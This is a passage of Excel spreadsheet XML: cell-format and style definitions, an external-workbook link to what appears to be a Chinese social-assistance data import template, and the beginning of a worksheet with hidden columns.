  <cellXfs count="121">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="2" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="3" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="70" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="57" fontId="3" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="5" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="86" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="5" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="84" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="3" borderId="1" xfId="71" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="0" borderId="1" xfId="71" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="9" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="4" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="9" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="4" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="11" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="11" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="7" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="7" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="7" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="0" borderId="1" xfId="75" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="2" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="14" fillId="2" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="80" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="4" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="11" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="87" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="88" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="11" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="17" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="17" fillId="0" borderId="4" xfId="89" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="16" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="9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20% - 强调文字颜色 1 10 2 3" xfId="49"/>
    <cellStyle name="40% - 强调文字颜色 1 6 2" xfId="50"/>
    <cellStyle name="40% - 强调文字颜色 2 11 2 3" xfId="51"/>
    <cellStyle name="差 25 3 4" xfId="52"/>
    <cellStyle name="20% - 强调文字颜色 3 12 2 2 2 3" xfId="53"/>
    <cellStyle name="40% - 强调文字颜色 6 11 3 2 4" xfId="54"/>
    <cellStyle name="检查单元格 8 3" xfId="55"/>
    <cellStyle name="常规 11 14 3 2 4" xfId="56"/>
    <cellStyle name="20% - 强调文字颜色 6 16 3 3" xfId="57"/>
    <cellStyle name="60% - 强调文字颜色 4 18 2" xfId="58"/>
    <cellStyle name="60% - 强调文字颜色 1 4 2 2" xfId="59"/>
    <cellStyle name="标题 3 16 2 2 2 3" xfId="60"/>
    <cellStyle name="常规 31 9 12 3" xfId="61"/>
    <cellStyle name="注释 3 3 3" xfId="62"/>
    <cellStyle name="注释 8 2 2 2 2" xfId="63"/>
    <cellStyle name="链接单元格 12 2 2 3" xfId="64"/>
    <cellStyle name="常规 9 11 2 2 2" xfId="65"/>
    <cellStyle name="60% - 强调文字颜色 3 24" xfId="66"/>
    <cellStyle name="常规 4 17 5 2 2" xfId="67"/>
    <cellStyle name="标题 3 14 2 2" xfId="68"/>
    <cellStyle name="样式 1 2 3 3 2 2" xfId="69"/>
    <cellStyle name="常规 10" xfId="70"/>
    <cellStyle name="常规 11" xfId="71"/>
    <cellStyle name="常规 10 23 2 2" xfId="72"/>
    <cellStyle name="链接单元格 18" xfId="73"/>
    <cellStyle name="输入 16 3 2" xfId="74"/>
    <cellStyle name="常规 20" xfId="75"/>
    <cellStyle name="适中 8" xfId="76"/>
    <cellStyle name="警告文本 26 2 2" xfId="77"/>
    <cellStyle name="常规_Sheet1" xfId="78"/>
    <cellStyle name="强调文字颜色 3 9 3 2" xfId="79"/>
    <cellStyle name="样式 1 5 3 2 2" xfId="80"/>
    <cellStyle name="常规 3" xfId="81"/>
    <cellStyle name="注释 10 3 3" xfId="82"/>
    <cellStyle name="常规 4" xfId="83"/>
    <cellStyle name="注释 18 2 3" xfId="84"/>
    <cellStyle name="常规 14" xfId="85"/>
    <cellStyle name="注释 5 4" xfId="86"/>
    <cellStyle name="注释 24 2 2" xfId="87"/>
    <cellStyle name="注释 8 2 2" xfId="88"/>
    <cellStyle name="常规 24" xfId="89"/>
  </cellStyles>
  <dxfs count="2">
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor rgb="FFFF9900"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor rgb="FFFF9900"/>
        </patternFill>
      </fill>
    </dxf>
  </dxfs>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium9" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="00FFFFFF"/>
      <color rgb="00FF0000"/>
      <color rgb="0000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admin\Desktop\&#25937;&#21161;&#31995;&#32479;\2024\2024.2\&#20302;&#20445;&#29305;&#22256;&#23548;&#20837;&#25968;&#25454;&#27169;&#26495;@20240126.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低保特困数据-导入模板"/>
      <sheetName val="选项"/>
      <sheetName val="区划代码查询表"/>
    </sheetNames>
    <sheetDataSet>
      <sheetData sheetId="0"/>
      <sheetData sheetId="1"/>
      <sheetData sheetId="2"/>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sheetPr>
  <dimension ref="B1:C142"/>
  <sheetViews>
    <sheetView showFormulas="1" topLeftCell="G1" workbookViewId="0">
      <selection activeCell="J6" sqref="J6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.25" outlineLevelCol="2"/>
  <cols>
    <col min="1" max="1" width="19.25" hidden="1" customWidth="1"/>
    <col min="2" max="2" width="6.625" customWidth="1"/>
    <col min="3" max="3" width="31.875" hidden="1" customWidth="1"/>
    <col min="4" max="6" width="9" hidden="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="2:3">
      <c r="B1" t="s">
        <v>0</v>
      </c>
      <c r="C1" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="2" customHeight="1" spans="2:3">
      <c r="B2" t="s">
        <v>2</v>
      </c>
